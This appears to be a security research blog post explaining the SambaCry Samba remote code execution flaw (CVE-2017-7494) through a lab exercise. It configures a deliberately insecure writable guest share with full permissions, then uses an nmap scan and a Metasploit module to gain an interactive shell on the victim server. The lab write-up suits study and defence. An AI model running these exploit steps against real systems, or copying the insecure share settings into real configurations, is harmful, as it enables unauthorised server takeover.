SambaCry RCE Exploit | Lucideus Research
Introduction
Samba in 4.5.9 version and before that is vulnerable to a remote code execution vulnerability named SambaCry. CVE-2017-7494 allows remote authenticated users to upload a shared library to a writable shared folder, and perform code execution attacks to take control of servers that host vulnerable Samba services.
Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 does not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder, and execute arbitrary code via a crafted named pipe.
Setup Server on Kali Linux 2.0 (2015)
Steps for Server Configuration:
- Check Samba Version
smbd -V - Locate Samba Configuration File
locate smb.conf - Create a SMB Share directory
mkdir /root/smbshare - Give full permission to the folder created above
chmod 777 /root/smbshare - Edit smb.conf to create a network share
nano /PATH/smb.conf - Add these lines at the bottom to create SMB Share
nt pipe support = yes
[smbshare]
comment = SMB_SHARE
path = /root/smbshare
browseable = yes
writable = yes
guest ok = yes
Save smb.conf - Start or Restart SMBD/NMBD Service
service smbd start
service nmbd start
service smbd restart
- Check SMBD Service Status
service smbd status
On Attacking Machine
- Run nmap scan on victim IP
nmap -sS -sV -sC IP - Check if victim is using vulnerable version of Samba
- Start Metasploit-Framework
msfconsole - Use is_known_pipename() module
use exploit/linux/samba/is_known_pipename - Set RHOST victim_IP
set RHOST victim_IP - Exploit
- Exploit is successful and we get an interactive shell
Vulnerability
Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 does not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder, and execute arbitrary code via a crafted named pipe.
InterProcess Communication
Interprocess communication (IPC) refers to the mechanisms an operating system provides to allow the processes to manage shared data. Typically, applications can use IPC, categorized as clients and servers, where the client requests data and the server responds to client requests.
Named Pipes
A named pipe is an extension to the traditional pipe concept on Unix and Unix-like systems, and is one of the methods of Interprocess Communication (IPC). The concept is also found in Microsoft Windows. A traditional pipe is "unnamed" and lasts only as long as the process. A named pipe, however, can last as long as the system is up, beyond the life of the process.
SMBD
SMBD is the server daemon that provides file sharing and printing services to Windows clients. The server provides filespace and printer services to clients using the SMB (or CIFS) protocol.
Microsoft Remote Procedure Call
Microsoft Remote Procedure Call (RPC) is a powerful technology for creating distributed client/server programs. RPC is an interprocess communication technique that allows client and server software to communicate.
MSRPC protocol allows to connect to a named pipe from remote destination. When trying to open a pipe using MSRPC on Samba, the server verifies the validity of the pipe name using the internal function is_known_pipename().
An external RPC server can be set using the ‘rpc_server’ variable inside smb.conf and then it will handle the pipe request.
The function is_known_pipename() doesn’t check that the pipe is valid, this allows to use ‘/’ to insert a full path of an arbitrary library.
